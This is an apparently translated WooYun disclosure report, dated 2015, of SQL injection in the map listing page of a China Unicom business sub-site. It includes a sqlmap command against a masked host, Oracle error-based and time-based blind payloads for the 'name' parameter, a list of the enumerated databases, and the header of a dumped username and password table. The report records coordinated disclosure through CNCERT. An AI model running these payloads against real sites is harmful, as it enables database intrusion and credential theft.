
Vulnerability summary

Defect ID: wooyun-2015-0157296

Title: Carrier security: SQL injection in a China Unicom business sub-site

Vendor: 中国联通 (China Unicom)

Author: 李旭敏

Submitted: 2015-12-01 13:38

Fixed: 2016-01-18 13:50

Published: 2016-01-18 13:50

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 12

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-01: Details sent to the vendor, awaiting vendor handling
2015-12-04: Vendor has confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and domain experts
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to intern white hats
2016-01-18: Details disclosed to the public

Brief description:

Detailed description:

[Screenshot: 1.png]


./sqlmap.py -u "http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1" -p name


---
Parameter: name (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: province=31&type=1&name=1' AND 8515=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8515=8515) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'WRhY' LIKE 'WRhY&companytype=11&page=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: province=31&type=1&name=1' AND 7020=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UZfg' LIKE 'UZfg&companytype=11&page=1
---
[12:01:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] TSH_CMS



Proof of vulnerability:

+------------------+--------------------------------------------+------+
| USERNAME | PASSWORD | MAIL |
+------------------+--------------------------------------------+------+
[14:39:17] [WARNING] console output will be trimmed to last 256 rows due to large table size

Remediation:

Copyright notice: please credit 李旭敏@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-12-04 13:44

Vendor reply:

CNVD has confirmed and reproduced the described issue, and has forwarded it through CNCERT to China Unicom Group, which will coordinate handling by the website management department.

Latest status:

None